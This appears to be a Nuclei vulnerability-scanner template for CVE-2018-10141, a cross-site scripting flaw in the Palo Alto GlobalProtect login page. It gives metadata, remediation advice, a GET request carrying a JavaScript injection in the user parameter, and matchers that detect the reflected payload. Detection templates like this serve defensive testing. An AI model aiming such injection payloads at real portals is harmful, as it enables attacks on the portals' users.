49 lines
1.5 KiB
YAML
49 lines
1.5 KiB
YAML
id: CVE-2018-10141
|
|
|
|
info:
|
|
name: Palo Alto Networks PAN-OS GlobalProtect <8.1.4 - Cross-Site Scripting
|
|
author: dhiyaneshDk
|
|
severity: medium
|
|
description: Palo Alto Networks PAN-OS before 8.1.4 GlobalProtect Portal Login page allows an unauthenticated attacker to inject arbitrary JavaScript or HTML, making it vulnerable to cross-site scripting.
|
|
remediation: |
|
|
Upgrade to Palo Alto Networks PAN-OS GlobalProtect VPN client version 8.1.4 or later to mitigate this vulnerability.
|
|
reference:
|
|
- https://security.paloaltonetworks.com/CVE-2018-10141
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2018-10141
|
|
classification:
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
|
cvss-score: 6.1
|
|
cve-id: CVE-2018-10141
|
|
cwe-id: CWE-79
|
|
epss-score: 0.00126
|
|
epss-percentile: 0.46927
|
|
cpe: cpe:2.3:o:paloaltonetworks:pan-os:*:*:*:*:*:*:*:*
|
|
metadata:
|
|
max-request: 1
|
|
vendor: paloaltonetworks
|
|
product: pan-os
|
|
tags: cve,cve2018,panos,vpn,globalprotect,xss
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- '{{BaseURL}}/global-protect/login.esp?user=j%22;-alert(1)-%22x'
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- 'var valueUser = "j";-alert(1)-"x";'
|
|
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- "text/html"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
|
|
# digest: 490a004630440220252530e39bd3fe3afc20cd5ea33ac154d41f4fbef8200f6453ab53dd03ab810602200224b4bb139c880407c4bb289b135649dfc4c0a1f2495811808d67774eaa1824:922c64590222798bb761d5b6d8e72950
|